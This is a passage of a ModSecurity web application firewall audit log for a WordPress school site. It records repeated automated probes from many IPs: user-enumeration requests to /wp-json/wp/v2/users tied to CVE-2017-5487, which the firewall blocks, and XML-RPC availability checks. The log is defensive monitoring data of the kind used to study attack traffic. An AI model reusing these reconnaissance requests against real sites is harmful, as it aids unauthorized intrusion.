User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--d3f49b71-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d3f49b71-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745601243695906 19897 (- - -)
Stopwatch2: 1745601243695906 19897; combined=4676, p1=3539, p2=1110, p3=0, p4=0, p5=27, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d3f49b71-Z--
--7949df1f-A--
[26/Apr/2025:00:14:06 +0700] aAvC3vKu9d5eAb6Kn9-NlwAAAME 103.236.140.4 60462 103.236.140.4 8181
--7949df1f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.248.82.54
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.248.82.54
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--7949df1f-C--
demo.sayHello
--7949df1f-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7949df1f-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745601246730385 6331 (- - -)
Stopwatch2: 1745601246730385 6331; combined=4596, p1=540, p2=3669, p3=31, p4=35, p5=210, sr=74, sw=111, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7949df1f-Z--
--c89ca13b-A--
[26/Apr/2025:00:21:50 +0700] aAvErj8HMZgF-3Y3GtHhTwAAAE8 103.236.140.4 59650 103.236.140.4 8181
--c89ca13b-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 115.127.33.97
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 115.127.33.97
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--c89ca13b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c89ca13b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745601710652239 2156 (- - -)
Stopwatch2: 1745601710652239 2156; combined=948, p1=307, p2=617, p3=0, p4=0, p5=24, sr=53, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c89ca13b-Z--
--a16f9c59-A--
[26/Apr/2025:00:44:56 +0700] aAvKGPKu9d5eAb6Kn9-o5AAAAM4 103.236.140.4 59622 103.236.140.4 8181
--a16f9c59-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.253.174.188
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.253.174.188
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--a16f9c59-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a16f9c59-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745603096723908 2969 (- - -)
Stopwatch2: 1745603096723908 2969; combined=1309, p1=427, p2=849, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a16f9c59-Z--
--97af8425-A--
[26/Apr/2025:00:44:59 +0700] aAvKG-OdEP6frSVs8CoBmQAAAAU 103.236.140.4 59810 103.236.140.4 8181
--97af8425-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.253.174.188
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.253.174.188
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--97af8425-C--
demo.sayHello
--97af8425-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--97af8425-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745603099571366 5500 (- - -)
Stopwatch2: 1745603099571366 5500; combined=3947, p1=500, p2=3197, p3=29, p4=32, p5=110, sr=66, sw=79, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--97af8425-Z--
--70365048-A--
[26/Apr/2025:01:23:01 +0700] aAvTBT8HMZgF-3Y3GtEPBgAAAFg 103.236.140.4 36040 103.236.140.4 8181
--70365048-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 61.228.136.45
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 61.228.136.45
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--70365048-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--70365048-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745605381147188 3011 (- - -)
Stopwatch2: 1745605381147188 3011; combined=1348, p1=473, p2=838, p3=0, p4=0, p5=37, sr=127, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--70365048-Z--
--aaef6f40-A--
[26/Apr/2025:01:26:41 +0700] aAvT4T8HMZgF-3Y3GtEP-AAAAE0 103.236.140.4 41310 103.236.140.4 8181
--aaef6f40-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 103.239.52.230
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 103.239.52.230
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--aaef6f40-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--aaef6f40-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745605601479274 1858 (- - -)
Stopwatch2: 1745605601479274 1858; combined=887, p1=278, p2=590, p3=0, p4=0, p5=19, sr=46, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--aaef6f40-Z--
--eeeb2670-A--
[26/Apr/2025:01:31:02 +0700] aAvU5vKu9d5eAb6Kn9_G_QAAAMM 103.236.140.4 47814 103.236.140.4 8181
--eeeb2670-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.242.42.62
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.242.42.62
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--eeeb2670-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--eeeb2670-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745605862309741 22159 (- - -)
Stopwatch2: 1745605862309741 22159; combined=4968, p1=3687, p2=1242, p3=0, p4=0, p5=38, sr=78, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--eeeb2670-Z--
--d84fa25e-A--
[26/Apr/2025:01:31:05 +0700] aAvU6T8HMZgF-3Y3GtESVAAAAE4 103.236.140.4 47894 103.236.140.4 8181
--d84fa25e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.242.42.62
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.242.42.62
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--d84fa25e-C--
demo.sayHello
--d84fa25e-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d84fa25e-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745605865339971 7226 (- - -)
Stopwatch2: 1745605865339971 7226; combined=5129, p1=718, p2=4107, p3=48, p4=42, p5=122, sr=139, sw=92, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d84fa25e-Z--
--1076e374-A--
[26/Apr/2025:01:57:07 +0700] aAvbA_Ku9d5eAb6Kn9_RSwAAANU 103.236.140.4 57636 103.236.140.4 8181
--1076e374-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 186.227.212.161
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 186.227.212.161
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--1076e374-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1076e374-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745607427449611 2630 (- - -)
Stopwatch2: 1745607427449611 2630; combined=1273, p1=415, p2=821, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1076e374-Z--
--8dd7507e-A--
[26/Apr/2025:02:07:09 +0700] aAvdXeOdEP6frSVs8Cov3QAAAAc 103.236.140.4 59992 103.236.140.4 8181
--8dd7507e-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 116.68.194.166
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 116.68.194.166
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--8dd7507e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8dd7507e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745608029554731 2859 (- - -)
Stopwatch2: 1745608029554731 2859; combined=1530, p1=486, p2=1007, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8dd7507e-Z--
--f103935e-A--
[26/Apr/2025:02:08:36 +0700] aAvdtOXF4ZX3hX-IbN51bQAAAIg 103.236.140.4 60324 103.236.140.4 8181
--f103935e-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 185.166.26.208
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 185.166.26.208
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--f103935e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f103935e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745608116599973 3229 (- - -)
Stopwatch2: 1745608116599973 3229; combined=1615, p1=557, p2=1011, p3=0, p4=0, p5=47, sr=161, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f103935e-Z--
--66a56346-A--
[26/Apr/2025:02:25:29 +0700] aAvhqeOdEP6frSVs8CoxGwAAAAI 103.236.140.4 36004 103.236.140.4 8181
--66a56346-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.240.99.71
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.240.99.71
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--66a56346-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--66a56346-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745609129593628 3488 (- - -)
Stopwatch2: 1745609129593628 3488; combined=1497, p1=512, p2=926, p3=0, p4=0, p5=59, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--66a56346-Z--
--d4ec071a-A--
[26/Apr/2025:02:25:37 +0700] aAvhseXF4ZX3hX-IbN52dwAAAJQ 103.236.140.4 36040 103.236.140.4 8181
--d4ec071a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.240.99.71
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.240.99.71
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--d4ec071a-C--
demo.sayHello
--d4ec071a-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d4ec071a-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745609137647095 6245 (- - -)
Stopwatch2: 1745609137647095 6245; combined=4668, p1=580, p2=3825, p3=31, p4=36, p5=113, sr=75, sw=83, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d4ec071a-Z--
--20191c5c-A--
[26/Apr/2025:02:42:11 +0700] aAvlk-XF4ZX3hX-IbN539gAAAJM 103.236.140.4 39898 103.236.140.4 8181
--20191c5c-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 80.87.128.193
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 80.87.128.193
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--20191c5c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--20191c5c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745610131960707 3068 (- - -)
Stopwatch2: 1745610131960707 3068; combined=1327, p1=436, p2=860, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--20191c5c-Z--
--a67dbb64-A--
[26/Apr/2025:02:58:47 +0700] aAvpd-XF4ZX3hX-IbN55nwAAAIQ 103.236.140.4 43776 103.236.140.4 8181
--a67dbb64-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 43.247.15.213
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 43.247.15.213
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--a67dbb64-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a67dbb64-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745611127710269 2815 (- - -)
Stopwatch2: 1745611127710269 2815; combined=1312, p1=439, p2=842, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a67dbb64-Z--
--da999f54-A--
[26/Apr/2025:03:26:43 +0700] aAvwA-OdEP6frSVs8CozYQAAAAA 103.236.140.4 50300 103.236.140.4 8181
--da999f54-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 198.23.217.37
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 198.23.217.37
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--da999f54-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--da999f54-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
